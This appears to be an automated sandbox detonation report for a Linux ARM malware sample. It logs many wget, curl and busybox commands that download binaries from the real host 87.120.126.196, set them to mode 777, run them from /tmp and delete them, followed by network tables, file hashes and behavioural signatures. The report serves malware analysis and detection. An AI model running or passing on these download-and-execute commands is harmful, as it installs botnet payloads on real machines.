[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 89.187.167.3:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
debian9-armhf-20240611-en
Max time kernel
33s
Max time network
34s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
